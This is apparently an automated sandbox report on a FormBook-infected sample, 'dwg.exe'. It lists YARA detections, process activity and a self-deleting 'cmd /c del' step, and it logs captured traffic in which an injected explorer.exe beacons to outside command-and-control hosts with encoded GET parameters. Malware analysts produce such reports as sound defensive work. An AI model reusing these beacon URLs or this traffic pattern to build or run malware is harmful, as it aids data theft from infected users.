                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                Session ID: 6
                                                Source IP: 192.168.2.5
                                                Source Port: 49733
                                                Destination IP: 146.148.189.216
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:35:31.477104902 CET
                                                kBytes transferred: 5766
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:31.959116936 CET
                                                kBytes transferred: 5767
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:32.568774939 CET
                                                kBytes transferred: 5767
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:33.678253889 CET
                                                kBytes transferred: 5768
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:35.896950960 CET
                                                kBytes transferred: 5768
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:38.115953922 CET
                                                kBytes transferred: 5768
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:40.335508108 CET
                                                kBytes transferred: 5769
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:44.772839069 CET
                                                kBytes transferred: 5771
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:

                                                Timestamp: Feb 25, 2021 15:35:53.696007013 CET
                                                kBytes transferred: 5957
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session ID: 7
                                                Source IP: 192.168.2.5
                                                Source Port: 49734
                                                Destination IP: 94.136.40.51
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:35:44.252448082 CET
                                                kBytes transferred: 5770
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1
                                                Host: www.karatetheokinawaway.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Feb 25, 2021 15:35:44.309845924 CET
                                                kBytes transferred: 5771
                                                Direction: IN
                                                Data: HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:43 GMT
                                                Content-Type: text/html
                                                Content-Length: 793
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 
65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                System Behavior

                                                General

                                                Start time:15:33:53
                                                Start date:25/02/2021
                                                Path:C:\Users\user\Desktop\dwg.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x400000
                                                File size:98304 bytes
                                                MD5 hash:6A9035B7435C6AA9E6C8E31CF771E316
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Visual Basic
                                                Reputation:low

                                                General

                                                Start time:15:34:05
                                                Start date:25/02/2021
                                                Path:C:\Users\user\Desktop\dwg.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x400000
                                                File size:98304 bytes
                                                MD5 hash:6A9035B7435C6AA9E6C8E31CF771E316
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:15:34:18
                                                Start date:25/02/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:
                                                Imagebase:0x7ff693d90000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:15:34:30
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                Imagebase:0xa90000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, Author: Florian Roth
                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:15:34:35
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x12c0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:15:34:36
                                                Start date:25/02/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
